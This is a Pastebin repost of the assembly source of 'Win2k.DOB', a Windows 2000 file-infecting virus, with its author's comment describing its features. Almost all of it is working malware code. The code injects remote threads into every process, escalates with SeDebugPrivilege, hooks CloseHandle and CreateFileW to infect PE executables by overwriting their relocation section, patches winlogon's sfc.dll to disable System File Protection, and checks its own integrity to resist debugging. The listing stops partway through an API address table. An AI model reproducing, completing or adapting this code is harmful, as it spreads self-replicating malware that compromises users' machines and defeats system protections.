FlyFar

Virus.Win2k.DOB - Source Code

Jun 20th, 2023
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 24.72 KB | Cybersecurity | 0 0
  1.  
  2. COMMENT#
  3.  
  4.                            ��������������������������¿
  5.                            ��������������������������Ŵ
  6.                            ��������������������������Ŵ
  7.                            ���Ŵ    Win2k.DOB     ���Ŵ
  8.                            ���Ŵ   by Benny/29A   ���Ŵ
  9.                            ��������������������������Ŵ
  10.                            ��������������������������Ŵ
  11.                            ����������������������������
  12.  
  13.  
  14.  
  15. Hello dear reader,
  16.  
  17. here is my another Win2k infector. This one is multi-process resident and featurez
  18. some small kind of stealth and runtime SFP disabling! The main viral code worx with
  19. all processes in the system and tries to inflitrate them. IF the process in
  20. winlogon.exe, it createz remote thread which will overwrite code that handlez System
  21. File Protection in Windows 2000. There's no need to restart computer, from the
  22. execution ALL filez protected by SFP are now unprotected! I used the same method
  23. which is described in article about SFC disabling in 29A-6 magazine. I have to
  24. mentioned that this code is coded by me and also Ratter of 29A.
  25.  
  26. In the case the found process is not winlogon.exe it triez to create remote thread
  27. which will hook CloseHandle and CreateFileW APIZ there. The mentioned semi-stealth
  28. mechanism worx in this way - when infected program tries to open infected file with
  29. CreateFileW API, virus will disinfect it and pass the execution to the API and host.
  30. When host program tries to close file by CloseHandle API, virus will try to infect
  31. it by my favourite method - overwritting of relocation section. I had this semi-stealth
  32. mechanism (semi becoz infection via CloseHandle doesnt always work - file is not alwayz
  33. opened with all required access rightz so many timez the infection will fail - and for now
  34. I dont know how to recieve filename from HANDLE by Win2k compatible way. If anyone knows
  35. it, pleaz gimme know!) for long yearz in my head. Originaly I wanted to implement it
  36. in Win32.Vulcano, but I was so lazy... I decided to code it now, well I know its a bit
  37. later, but better later than never :)
  38.  
  39. Virus also chex its own integrity on the start (by CRC32) so in the case someone set
  40. some breakpointz in the viral code, virus will not run.
  41.  
  42. I didnt test Win2k.DOB very deeply, so it is possible that it has some bugz. However,
  43. again I didnt code it for spreading, but to show some new ideaz. I hope you will like
  44. this virus...
  45.  
  46.  
  47. (c)oded in September, 2001
  48. Czech Republic.
  49. #
  50.  
  51.  
  52. .386p
  53. .model  flat
  54.  
  55. include win32api.inc
  56. include useful.inc
  57. include mz.inc
  58. include pe.inc
  59.  
  60.  
  61. invoke  macro   api             ;macro for API callz
  62.     extrn   api:PROC            ;declare API
  63.     call    api             ;call it...
  64. endm
  65.  
  66.  
  67. @SEH_SetupFrame_UnProtect   macro
  68.     local   set_new_eh
  69.     local   exception_handler
  70.     local   @n
  71.  
  72.     call    set_new_eh
  73.     pushad
  74.  
  75.     mov ebx,dword ptr [esp+cPushad+EH_ExceptionRecord]
  76.     cmp dword ptr [ebx.ER_ExceptionCode],EXCEPTION_ACCESS_VIOLATION
  77.         jne exception_handler
  78.  
  79.     call    @n
  80.     dd  ?
  81. @n: mov ebx,[ebx.ER_ExceptionInformation+4]
  82.     push    PAGE_READWRITE
  83.     and ebx,0FFFFF000h
  84.     push    2*4096
  85.     push    ebx
  86.     mov eax,12345678h
  87. _VirtualProtect = dword ptr $-4
  88.     call    eax             ;unprotect 2 pagez
  89.  
  90. exception_handler:
  91.     popad
  92.     xor eax,eax
  93.     ret
  94.  
  95. set_new_eh:                 ;set SEH frame
  96.     xor edx,edx
  97.     push    dword ptr fs:[edx]
  98.     mov fs:[edx],esp
  99. endm
  100.  
  101.  
  102. .data
  103.  
  104.  
  105. ;this is the remote thread that getz executed in infected process
  106.  
  107. rtStart Proc
  108.     pushad
  109. tdelta = $+5
  110.     @SEH_SetupFrame <jmp    end_thread>
  111.  
  112.     mov ebp,[esp+4]         ;EBP = delta offset
  113.  
  114.     ;hook 2 APIz - CloseHandle and CreateFileW
  115.  
  116.     mov esi,12345678h
  117. _CloseHandle = dword ptr $-4
  118.     cmp [esi],64EC8B55h         ;check CloseHandle API...
  119.     jne try_cfw
  120.     cmp dword ptr [esi+4],000018A1h ;...code
  121.     jne try_cfw
  122.     mov eax,esi
  123.     neg esi
  124.     add esi,newCloseHandle-rtStart-5
  125.     add esi,12345678h
  126. virus_base = dword ptr $-4
  127.     mov byte ptr [eax],0E9h     ;create "JMP <virus>"
  128.     mov [eax+1],esi
  129.     mov [eax+5],90909090h       ;fill with NOPs
  130.     add eax,9
  131.     mov [ebp + nextCH - tdelta],eax ;save the address
  132.  
  133. ;and do the same for CreateFileW API
  134.  
  135. try_cfw:mov esi,12345678h
  136. _CreateFileW = dword ptr $-4
  137.     cmp [esi],83EC8B55h
  138.     jne end_thread
  139.     cmp word ptr [esi+4],5CECh
  140.     jne end_thread
  141.     mov eax,esi
  142.     neg esi
  143.     add esi,newCreateFileW-rtStart-5
  144.     add esi,[ebp + virus_base - tdelta]
  145.     mov byte ptr [eax],0E9h
  146.     mov [eax+1],esi
  147.     mov byte ptr [eax+5],90h
  148.     add eax,6
  149.     mov [ebp + nextCFW - tdelta],eax
  150.  
  151. end_thread:
  152.     @SEH_RemoveFrame
  153.     popad
  154.     ret
  155.  
  156.  
  157. ;hooker for CreateFileW - disinfectz opened file from virus
  158.  
  159. newCreateFileW:
  160.     pushad
  161.     call    @oldCFW
  162.  
  163.     cdelta = $
  164. bytez_CreateFileW:
  165.     push    ebp             ;overwritten code
  166.     mov ebp,esp
  167.     sub esp,5Ch
  168.     push    12345678h           ;return address
  169. nextCFW = dword ptr $-4
  170.     ret
  171.  
  172. @oldCFW:pop ebp             ;EBP = delta offset
  173.  
  174.     mov ecx,12345678h
  175. semaphore = dword ptr $-4
  176.     jecxz   c_cfw
  177.     xor eax,eax
  178.     and [ebp + semaphore - cdelta],eax
  179.  
  180.     call    disinfect           ;try to disinfect the file
  181.     mov [ebp + semaphore - cdelta],ebp
  182. c_cfw:  popad
  183.     jmp bytez_CreateFileW       ;and run the previous code
  184.  
  185.  
  186. ;hooker for CloseHandle - infectz file which's getting closed
  187.  
  188. newCloseHandle:
  189.     pushad
  190.     call    @oldCH
  191.  
  192.     hdelta = $
  193. bytez_CloseHandle:
  194.     push    ebp             ;overwritten code
  195.     mov ebp,esp
  196.     mov eax,LARGE fs:[18h]
  197.     push    12345678h           ;return address
  198. nextCH = dword ptr $-4
  199.     ret
  200.  
  201. @oldCH: pop ebp             ;EBP = delta offset
  202.  
  203.     mov ecx,[ebp + semaphore - hdelta]
  204.     jecxz   c_ch
  205.     and dword ptr [ebp + semaphore - hdelta],0
  206.  
  207.     call    tryInfect           ;try to infect
  208.     mov [ebp + semaphore - hdelta],ebp
  209. c_ch:   popad
  210.     jmp bytez_CloseHandle       ;and run the previous code
  211.  
  212.  
  213. tryInfect:
  214.     mov ebx,[esp.cPushad+8]     ;get the handle
  215.     push    ebx
  216.     mov eax,12345678h
  217. _GetFileType = dword ptr $-4
  218.     call    eax
  219.     dec eax
  220.     je  c_ti                ;must be FILE_TYPE_DISK
  221. end_ti: ret
  222.  
  223. c_ti:   push    eax
  224.     push    eax
  225.     push    eax
  226.     push    PAGE_READWRITE
  227.     push    eax
  228.     push    ebx
  229.     mov eax,12345678h
  230. _CreateFileMappingA = dword ptr $-4
  231.     call    eax             ;map the file
  232.     cdq
  233.     xchg    eax,ecx
  234.     jecxz   end_ti
  235.     mov [ebp + hFile - hdelta],ecx
  236.  
  237.     push    edx
  238.     push    edx
  239.     push    edx
  240.     push    FILE_MAP_WRITE
  241.     push    ecx
  242.     mov eax,12345678h
  243. _MapViewOfFile = dword ptr $-4
  244.     call    eax             ;--- " " ---
  245.     test    eax,eax
  246.     je  close_file
  247.     xchg    eax,ebx
  248.     mov [ebp + lpFile - hdelta],ebx
  249.     jmp n_open
  250.  
  251. unmap_file:
  252.     push    12345678h
  253. lpFile = dword ptr $-4
  254.     mov eax,12345678h
  255. _UnmapViewOfFile = dword ptr $-4
  256.     call    eax             ;unmap the file
  257. close_file:
  258.     push    12345678h
  259. hFile = dword ptr $-4
  260.     call    [ebp + _CloseHandle - hdelta]   ;--- " " ---
  261.     ret
  262.  
  263.  
  264. n_open: mov esi,[ebx.MZ_lfanew]
  265.     add esi,ebx
  266.     mov eax,[esi]
  267.     add eax,-IMAGE_NT_SIGNATURE
  268.     jne unmap_file          ;must be PE file
  269.  
  270.     ;discard not_executable and system filez
  271.     cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
  272.     jne unmap_file
  273.     mov ax,[esi.NT_FileHeader.FH_Characteristics]
  274.     test    ax,IMAGE_FILE_EXECUTABLE_IMAGE
  275.     je  unmap_file
  276.     test    ax,IMAGE_FILE_DLL
  277.     jne unmap_file
  278.     test    ax,IMAGE_FILE_SYSTEM
  279.     jne unmap_file
  280.     mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
  281.     test    al,IMAGE_SUBSYSTEM_NATIVE
  282.     jne unmap_file
  283.  
  284.     movzx   eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
  285.     dec eax
  286.     test    eax,eax
  287.     je  unmap_file
  288.     imul    eax,eax,IMAGE_SIZEOF_SECTION_HEADER
  289.     movzx   edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
  290.     lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
  291.     add edi,esi
  292.     lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
  293.     mov eax,[edx]
  294.     test    eax,eax
  295.     je  unmap_file
  296.     cmp eax,[edi.SH_VirtualAddress]
  297.     jne unmap_file
  298.     cmp [edi.SH_SizeOfRawData],virtual_end-rtStart
  299.     jb  unmap_file          ;is it large enough?
  300.  
  301.     pushad
  302.     xor eax,eax
  303.     mov edi,edx
  304.     stosd
  305.     stosd
  306.     popad                   ;erase relocs record
  307.  
  308.     ;align the section size
  309.     mov eax,virtual_end-rtStart
  310.     cmp eax,[edi.SH_VirtualSize]
  311.     jb  o_vs
  312.     mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
  313.     cdq
  314.     div ecx
  315.     test    edx,edx
  316.     je  o_al
  317.     inc eax
  318. o_al:   mul ecx
  319.     mov [edi.SH_VirtualSize],eax
  320.  
  321. o_vs:   push    dword ptr [ebp + original_ep - hdelta]
  322.  
  323.     mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
  324.     mov ecx,[edi.SH_VirtualAddress]
  325.     add ecx,Start-rtStart
  326.     mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ecx
  327.     mov [ebp + original_ep - hdelta],eax
  328.     mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
  329.     add [ebp + original_ep - hdelta],eax
  330.                         ;set saved_entrypoint variable
  331.     pushad
  332.     mov edi,[edi.SH_PointerToRawData]
  333.     add edi,ebx
  334.     lea esi,[ebp + rtStart - hdelta]
  335.     mov ecx,(virtual_end-rtStart+3)/4
  336.     rep movsd               ;overwrite relocs by virus body
  337.     popad
  338.     pop dword ptr [ebp + original_ep - hdelta]
  339.                         ;restore used variablez
  340.     or  dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
  341.     jmp unmap_file
  342.  
  343.  
  344. disinfect:
  345.     push    eax
  346.     push    FILE_ATTRIBUTE_NORMAL
  347.     push    OPEN_EXISTING
  348.     push    eax
  349.     push    FILE_SHARE_READ
  350.     push    GENERIC_READ or GENERIC_WRITE
  351.     push    dword ptr [esp.cPushad+32]
  352.     call    [ebp + _CreateFileW - cdelta]       ;open the file
  353.     inc eax
  354.     jne c_di
  355.     ret
  356.  
  357. c_di:   dec eax
  358.     mov [ebp + cFile - cdelta],eax
  359.     cdq
  360.     xor edx,edx
  361.     push    edx
  362.     push    edx
  363.     push    edx
  364.     push    PAGE_READWRITE
  365.     push    edx
  366.     push    eax
  367.     call    [ebp + _CreateFileMappingA - cdelta]    ;create file mapping
  368.     cdq
  369.     xchg    eax,ecx
  370.     jecxz   c_close_file
  371.     mov [ebp + cMapFile - cdelta],ecx
  372.  
  373.     push    edx
  374.     push    edx
  375.     push    edx
  376.     push    FILE_MAP_WRITE
  377.     push    ecx
  378.     call    [ebp + _MapViewOfFile - cdelta]     ;map to address space
  379.     test    eax,eax
  380.     je  c_close_file2
  381.     xchg    eax,ebx
  382.     mov [ebp + clpFile - cdelta],ebx
  383.     jmp n_copen
  384.  
  385. c_unmap_file:
  386.     push    12345678h
  387. clpFile = dword ptr $-4
  388.     call    [ebp + _UnmapViewOfFile - cdelta]   ;unmap file
  389. c_close_file2:
  390.     push    12345678h
  391. cMapFile = dword ptr $-4
  392.     call    [ebp + _CloseHandle - cdelta]       ;close file mapping
  393. c_close_file:
  394.     push    12345678h
  395. cFile = dword ptr $-4
  396.     call    [ebp + _CloseHandle - cdelta]       ;and the file itself
  397.     ret
  398.  
  399. n_copen:mov esi,[ebx.MZ_lfanew]
  400.     add esi,ebx
  401.     mov eax,[esi]
  402.     add eax,-IMAGE_NT_SIGNATURE
  403.     jne c_unmap_file            ;must be PE file
  404.  
  405.     movzx   eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
  406.     dec eax
  407.     test    eax,eax
  408.     je  unmap_file
  409.     imul    eax,eax,IMAGE_SIZEOF_SECTION_HEADER
  410.     movzx   edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
  411.     lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
  412.     add edi,esi
  413.     cmp [edi],'ler.'
  414.     jne c_unmap_file
  415.     cmp dword ptr [edi+4],'co'
  416.     jne c_unmap_file            ;must be ".reloc"
  417.     lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
  418.     xor ecx,ecx
  419.     cmp [edx],ecx
  420.     jne c_unmap_file            ;must be NULL
  421.     mov eax,[edi.SH_VirtualAddress]
  422.     mov [edx],eax           ;restore the address field
  423.     mov eax,[edi.SH_VirtualSize]
  424.     mov [edx+4],eax         ;and the size field
  425.     xchg    eax,ecx
  426.  
  427.     mov ecx,[edi.SH_SizeOfRawData]
  428.     mov edi,[edi.SH_PointerToRawData]
  429.     add edi,ebx
  430.  
  431.     pushad
  432.     push    esi
  433.     mov esi,edi
  434.     lea edi,[ebp + end_seh - cdelta]
  435.     mov ecx,original_ep-end_seh
  436. l_ep:   pushad
  437.     rep cmpsb
  438.     popad
  439.     je  got_ep
  440.     inc esi
  441.     jmp l_ep
  442. got_ep: add esi,original_ep-end_seh     ;find the saved entrypoint in virus body
  443.     lodsd
  444.     pop esi
  445.     sub eax,[esi.NT_OptionalHeader.OH_ImageBase]
  446.     mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],eax
  447.     popad                   ;restore it
  448.     rep stosb               ;and overwrite body with NULLs
  449.  
  450.     jmp c_unmap_file
  451.  
  452. rtStart EndP
  453.  
  454.  
  455. signature   db  0,'[Win2k.DOB], multi-process stealth project by Benny/29A',0
  456.                         ;little signature ;-)
  457.  
  458.  
  459. ; !!! VIRAL CODE STARTS HERE !!!
  460.  
  461. Start:  pushad
  462. gdelta = $+5
  463.     @SEH_SetupFrame <jmp end_seh>       ;setup SEH frame
  464.  
  465.     call    check_crc32         ;check viral body consistency
  466.  
  467. protected:
  468.     mov ebp,[esp+4]         ;EBP = delta offset
  469.  
  470.     mov edx,cs
  471.     xor dl,dl
  472.     jne end_seh             ;must be under winNT/2k!
  473.  
  474.     call    get_base            ;get K32 base address
  475.     call    get_apiz            ;find addresses of APIz
  476.     call    advapi_apiz         ;get ADVAPI32 apiz
  477.     call    psapi_apiz          ;get PSAPI apiz
  478.  
  479.     mov eax,12345678h
  480. _GetCurrentProcess = dword ptr $-4
  481.     call    eax             ;get current process pseudohandle
  482.     lea ecx,[ebp + p_token - gdelta]
  483.     push    ecx
  484.     push    20h
  485.     push    eax
  486.     mov eax,12345678h
  487. _OpenProcessToken = dword ptr $-4       ;open token of our process
  488.     call    eax
  489.     dec eax
  490.     jne err_ap
  491.  
  492.     lea ecx,[ebp + p_luid - gdelta]
  493.     push    ecx
  494.     @pushsz 'SeDebugPrivilege'
  495.     push    eax
  496.     mov eax,12345678h
  497. _LookupPrivilegeValueA = dword ptr $-4      ;find LUID for this priv.
  498.     call    eax
  499.     dec eax
  500.     jne err_ap
  501.  
  502.     lea ecx,[ebp + token_priv - gdelta]
  503.     push    eax
  504.     push    eax
  505.     push    10h
  506.     push    ecx
  507.     push    eax
  508.     push    dword ptr [ebp + p_token - gdelta]
  509.     mov eax,12345678h
  510. _AdjustTokenPrivileges = dword ptr $-4
  511.     call    eax             ;adjust higher priviledges
  512.                         ;for our process ;-)
  513. err_ap: lea esi,[ebp + procz - gdelta]
  514.     lea eax,[ebp + tmp - gdelta]
  515.     push    eax
  516.     push    80h
  517.     push    esi
  518.     mov eax,12345678h
  519. _EnumProcesses = dword ptr $-4
  520.     call    eax             ;enumerate all running processes
  521.     dec eax
  522.     jne end_seh
  523.     add esi,4
  524.  
  525. p_search:
  526.     lodsd                   ;get PID
  527.     test    eax,eax
  528.     je  end_ps
  529.     call    analyse_process         ;and try to infect it
  530.     jmp p_search
  531.  
  532. end_ps: push    12345678h
  533. _advapi32 = dword ptr $-4
  534.     mov esi,12345678h
  535. _FreeLibrary = dword ptr $-4
  536.     call    esi
  537.     push    12345678h
  538. _psapi = dword ptr $-4
  539.     call    esi             ;free ADVAPI32 and PSAPI libz
  540. end_seh:@SEH_RemoveFrame            ;remove SEH frame
  541.     popad
  542.  
  543.     extrn   ExitProcess:PROC
  544.     push    cs
  545.     push    offset ExitProcess
  546. original_ep = dword ptr $-4
  547.     retf                    ;jump to host!
  548.  
  549.  
  550. analyse_process Proc
  551.     pushad
  552.     push    eax
  553.     push    0
  554.     push    43Ah
  555.     mov eax,12345678h
  556. _OpenProcess = dword ptr $-4
  557.     call    eax             ;PID -> handle
  558.     test    eax,eax
  559.     je  end_ap
  560.     mov [ebp + hProcess - gdelta],eax
  561.     push    eax
  562.  
  563.     push    eax
  564.     lea esi,[ebp + modz - gdelta]
  565.     lea ecx,[ebp + tmp - gdelta]
  566.     push    ecx
  567.     push    4
  568.     push    esi
  569.     push    eax
  570.     mov eax,12345678h
  571. _EnumProcessModules = dword ptr $-4
  572.     call    eax             ;get first (main) module
  573.     pop ecx
  574.     dec eax
  575.     jne end_ap1
  576.  
  577.     lodsd
  578.     lea edi,[ebp + mod_name - gdelta]
  579.     push    MAX_PATH
  580.     push    edi
  581.     push    eax
  582.     push    ecx
  583.     mov eax,12345678h
  584. _GetModuleBaseNameA = dword ptr $-4
  585.     call    eax             ;get its name
  586.     xchg    eax,ecx
  587.     test    ecx,ecx
  588.     je  end_ap1
  589.  
  590.     @pushsz 'winlogon.exe'
  591.     pop esi
  592.     mov ebx,edi
  593.     pushad
  594.     rep cmpsb
  595.     popad
  596.     je  r_winlogon          ;is it winlogon?
  597.  
  598.     ;nope, try to infect the process
  599.  
  600.     lea esi,[ebp + rtStart - gdelta]
  601.     mov edi,virtual_end-rtStart
  602.     call    r_create_thread
  603.     jmp end_ap1
  604.  
  605. r_winlogon:
  606.  
  607.     ;yeah, disable SFP!
  608.  
  609.     lea esi,[ebp + winlogon_start_rroutine - gdelta]
  610.     mov edi,winlogon_end_rroutine-winlogon_start_rroutine
  611.     call    r_create_thread
  612.  
  613. end_ap1:call    [ebp + _CloseHandle - gdelta]
  614. end_ap: popad
  615.     ret
  616. analyse_process EndP
  617.  
  618.  
  619. ;this proc createz remote thread
  620.  
  621. r_create_thread Proc
  622.         push    PAGE_READWRITE
  623.     push    MEM_RESERVE or MEM_COMMIT
  624.     push    edi
  625.     push    0
  626.     push    12345678h
  627. hProcess = dword ptr $-4
  628.     mov eax,12345678h
  629. _VirtualAllocEx = dword ptr $-4
  630.     call    eax             ;aloc there a memory
  631.     test    eax,eax
  632.     je  err_rcr
  633.     xchg    eax,ebx
  634.     mov [ebp + virus_base - gdelta],ebx
  635.  
  636.     push    0
  637.     push    edi
  638.     push    esi
  639.     push    ebx
  640.     push    dword ptr [ebp + hProcess - gdelta]
  641.     mov eax,12345678h
  642. _WriteProcessMemory = dword ptr $-4
  643.     call    eax             ;write there our code
  644.     dec eax
  645.     jne free_mem
  646.  
  647.     lea ecx,[ebp + tmp - gdelta]
  648.     push    ecx
  649.     push    PAGE_READWRITE
  650.     push    1
  651.     push    dword ptr [ebp + _CloseHandle - gdelta]
  652.     push    dword ptr [ebp + hProcess - gdelta]
  653.     mov eax,12345678h
  654. _VirtualProtectEx = dword ptr $-4
  655.     call    eax             ;unprotect first CloseHandle API page
  656.     dec eax
  657.     jne free_mem
  658.  
  659.     lea ecx,[ebp + tmp - gdelta]
  660.     push    ecx
  661.     push    PAGE_READWRITE
  662.     push    1
  663.     push    dword ptr [ebp + _CreateFileW - gdelta]
  664.     push    dword ptr [ebp + hProcess - gdelta]
  665.     call    [ebp + _VirtualProtectEx - gdelta]  ;unprotect first CreateFileW API page
  666.     dec eax
  667.     jne free_mem
  668.  
  669.     xor edx,edx
  670.     push    edx
  671.     push    edx
  672.     push    edx
  673.     push    ebx
  674.     push    edx
  675.     push    edx
  676.     push    dword ptr [ebp + hProcess - gdelta]
  677.     mov eax,12345678h
  678. _CreateRemoteThread = dword ptr $-4
  679.     call    eax             ;run remote thread!
  680.     push    eax
  681.     call    [ebp + _CloseHandle - gdelta]
  682. err_rcr:ret
  683. free_mem:
  684.     push    MEM_RELEASE
  685.     push    0
  686.     push    ebx
  687.     push    dword ptr [ebp + hProcess - gdelta]
  688.     mov eax,12345678h
  689. _VirtualFreeEx = dword ptr $-4
  690.     call    eax             ;free memory
  691.     ret
  692. r_create_thread EndP
  693.  
  694.  
  695. winlogon_start_rroutine Proc
  696.     pushad
  697.  
  698.     @SEH_SetupFrame_UnProtect       ;set SEH frame
  699.  
  700.     @pushsz 'sfc.dll'
  701.     mov eax,12345678h
  702. _GetModuleHandleA = dword ptr $-4
  703.     call    eax             ;get sfc.dll address
  704.     test    eax,eax
  705.     je  end_rseh
  706.     xchg    eax,esi
  707.  
  708.     mov eax,[esi.MZ_lfanew]
  709.     add eax,esi
  710.     movzx   edx,word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]
  711.     lea edx,[edx+eax+(3*IMAGE_SIZEOF_FILE_HEADER)]
  712.     mov ecx,[edx.SH_SizeOfRawData]  ;get size of section
  713.  
  714.     call    @s_str
  715. @b_str: db  0FFh,15h,8Ch,12h,93h,76h    ;code to search & patch
  716.     db  85h,0C0h
  717.     db  0Fh,8Ch,0F1h,00h,00h,00h
  718.     db  0Fh,84h,0EBh,00h,00h,00h
  719.     db  3Dh,02h,01h,00h,00h
  720. @s_str: pop edi
  721. s_str:  pushad
  722.     push    @s_str-@b_str
  723.     pop ecx
  724.     rep cmpsb               ;search for code
  725.     popad
  726.     je  got_addr
  727.     inc esi
  728.     loop    s_str
  729.     jmp end_rseh
  730.  
  731. got_addr:
  732.     call    e_next
  733.  
  734. s_next: push    0               ;"patch" code
  735.     mov eax,12345678h
  736. _ExitThread = dword ptr $-4
  737.     call    eax
  738.  
  739. e_next: pop edi
  740.     xchg    esi,edi
  741.     add edi,6
  742.         mov ecx,e_next-s_next
  743.         rep movsb               ;patch sfc.dll code by our code
  744.  
  745. end_rseh:
  746.     @SEH_RemoveFrame
  747.     popad
  748.     ret                 ;and quit
  749.  
  750. winlogon_end_rroutine:
  751. winlogon_start_rroutine EndP
  752.  
  753.  
  754.  
  755. ;this procedure can retrieve base address of K32
  756. get_base    Proc
  757.     mov eax,077E80000h      ;get lastly used address
  758. last_kern = dword ptr $-4
  759.     call    check_kern      ;is this address valid?
  760.     jecxz   end_gb          ;yeah, we got the address
  761.  
  762.     call    gb_table        ;jump over the address table
  763.     dd  077E00000h      ;NT/W2k
  764.     dd  077E80000h      ;NT/W2k
  765.     dd  077ED0000h      ;NT/W2k
  766.     dd  077F00000h      ;NT/W2k
  767.     dd  0BFF70000h      ;95/98
  768. gb_table:
  769.     pop edi         ;get pointer to address table
  770.     push    4           ;get number of items in the table
  771.     pop esi         ;to ESI
  772. gbloop: mov eax,[edi+esi*4]     ;get item
  773.     call    check_kern      ;is address valid?
  774.     jecxz   end_gb          ;yeah, we got the valid address
  775.     dec esi         ;decrement ESI
  776.     test    esi,esi         ;end of table?
  777.     jne gbloop          ;nope, try next item
  778.  
  779.     call    scan_kern       ;scan the address space for K32
  780. end_gb: ret             ;quit
  781.  
  782. check_kern:             ;check if K32 address is valid
  783.     mov ecx,eax         ;make ECX != 0
  784.     pushad              ;store all registers
  785.     @SEH_SetupFrame <jmp    end_ck> ;setup SEH frame
  786.     movzx   edx,word ptr [eax]  ;get two bytes
  787.     add edx,-"ZM"       ;is it MZ header?
  788.     jne end_ck          ;nope
  789.     mov     ebx,[eax.MZ_lfanew] ;get pointer to PE header
  790.     add ebx,eax         ;normalize it
  791.     mov ebx,[ebx]       ;get four bytes
  792.     add ebx,-"EP"       ;is it PE header?
  793.     jne end_ck          ;nope
  794.     xor ecx,ecx         ;we got K32 base address
  795.     mov [ebp + last_kern - gdelta],eax  ;save K32 base address
  796. end_ck: @SEH_RemoveFrame        ;remove SEH frame
  797.     mov [esp.Pushad_ecx],ecx    ;save ECX
  798.     popad               ;restore all registers
  799.     ret             ;if ECX == 0, address was found
  800.  
  801. SEH_hndlr macro             ;macro for SEH
  802.         @SEH_RemoveFrame        ;remove SEH frame
  803.     popad               ;restore all registers
  804.         add dword ptr [ebp + bAddr - gdelta],1000h  ;explore next page
  805.         jmp bck         ;continue execution
  806. endm
  807.  
  808. scan_kern:              ;scan address space for K32
  809. bck:    pushad              ;store all registers
  810.     @SEH_SetupFrame <SEH_hndlr> ;setup SEH frame
  811.     mov eax,077000000h      ;starting/last address
  812. bAddr = dword ptr $-4
  813.     movzx   edx,word ptr [eax]  ;get two bytes
  814.     add edx,-"ZM"       ;is it MZ header?
  815.     jne pg_flt          ;nope
  816.     mov     edi,[eax.MZ_lfanew] ;get pointer to PE header
  817.     add edi,eax         ;normalize it
  818.     mov ebx,[edi]       ;get four bytes
  819.     add ebx,-"EP"       ;is it PE header?
  820.     jne pg_flt          ;nope
  821.     mov ebx,eax
  822.     mov esi,eax
  823.     add ebx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
  824.     add esi,[ebx.ED_Name]
  825.     mov esi,[esi]
  826.     add esi,-'NREK'
  827.     je  end_sk
  828. pg_flt: xor ecx,ecx         ;we got K32 base address
  829.     mov [ecx],esi       ;generate PAGE FAULT! search again...
  830. end_sk: mov [ebp + last_kern - gdelta],eax  ;save K32 base address
  831.     @SEH_RemoveFrame        ;remove SEH frame
  832.     mov [esp.Pushad_eax],eax    ;save EAX - K32 base
  833.     popad               ;restore all registers
  834.     ret
  835. get_base    EndP
  836.  
  837.  
  838. get_apiz    Proc
  839.     mov esi,eax         ;base of K32
  840.     mov edx,[esi.MZ_lfanew]
  841.     add edx,esi
  842.     mov ebx,[edx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
  843.     add ebx,esi
  844.     mov ecx,[ebx.ED_NumberOfNames]
  845.     mov edx,[ebx.ED_AddressOfNames]
  846.     add edx,esi
  847.  
  848.     xor eax,eax
  849. c_find: pushad
  850.     add esi,[edx+eax*4]
  851.     push    esi
  852.     @endsz
  853.     mov edi,esi
  854.     pop esi
  855.     sub edi,esi
  856.     call    CRC32           ;calculate CRC32 of the API
  857.  
  858.     push    n_apiz          ;number of apiz
  859.     pop ecx
  860.  
  861.     call    @callz
  862. s_apiz: dd  082B618D4h      ;GetModuleHandleA
  863.     dd  04134D1ADh      ;LoadLibraryA
  864.     dd  0AFDF191Fh      ;FreeLibrary
  865.     dd  0FFC97C1Fh      ;GetProcAddress
  866.     dd  079C3D4BBh      ;VirtualProtect
  867.     dd  0058F9201h      ;ExitThread
  868.     dd  003690E66h      ;GetCurrentProcess
  869.     dd  033D350C4h      ;OpenProcess
  870.     dd  0DA89FC22h      ;VirtualAllocEx
  871.     dd  00E9BBAD5h      ;WriteProcessMemory
  872.     dd  0CF4A7F65h      ;CreateRemoteThread
  873.     dd  0700ED6DFh      ;VirtualFreeEx
  874.     dd  068624A9Dh      ;CloseHandle
  875.     dd  056E1B657h      ;VirtualProtectEx
  876.     dd  000D38F42h      ;GetFileType
  877.     dd  096B2D96Ch      ;CreateFileMappingA
  878.     dd  0797B49ECh      ;MapViewOfFile
  879.     dd  094524B42h      ;UnmapViewOfFile
  880.     dd  090119808h      ;CreateFileW
  881. n_apiz = ($-s_apiz)/4
  882. @callz: pop edx
  883.  
  884. c_look: cmp [edx-4+(ecx*4)],eax ;is it our API?
  885.     je  got_call        ;yeah
  886.     loop    c_look          ;nope, look for another API in our table
  887. c_out:  popad
  888.     inc eax
  889.     loop    c_find
  890.     ret
  891.  
  892. got_call:
  893.     mov edx,[ebx.ED_AddressOfOrdinals]
  894.     mov esi,[esp.Pushad_esi]
  895.     add edx,esi
  896.     mov eax,[esp.Pushad_eax]
  897.     movzx   eax,word ptr [edx+eax*2]
  898.     mov edx,esi
  899.     add edx,[ebx.ED_AddressOfFunctions]
  900.     mov eax,[edx+eax*4]
  901.     add eax,esi
  902.  
  903.     lea edx,[ebp + Start - gdelta]
  904.     add edx,[ebp + api_addr-4+ecx*4 - gdelta]
  905.     mov [edx],eax       ;save it
  906.     jmp c_out
  907. get_apiz    EndP
  908.  
  909.  
  910. api_addr:               ;where to save apiz numberz...
  911.     dd  offset _GetModuleHandleA-Start
  912.     dd  offset _LoadLibraryA-Start
  913.     dd  offset _FreeLibrary-Start
  914.     dd  offset _GetProcAddress-Start
  915.     dd  offset _VirtualProtect-Start
  916.     dd  offset _ExitThread-Start
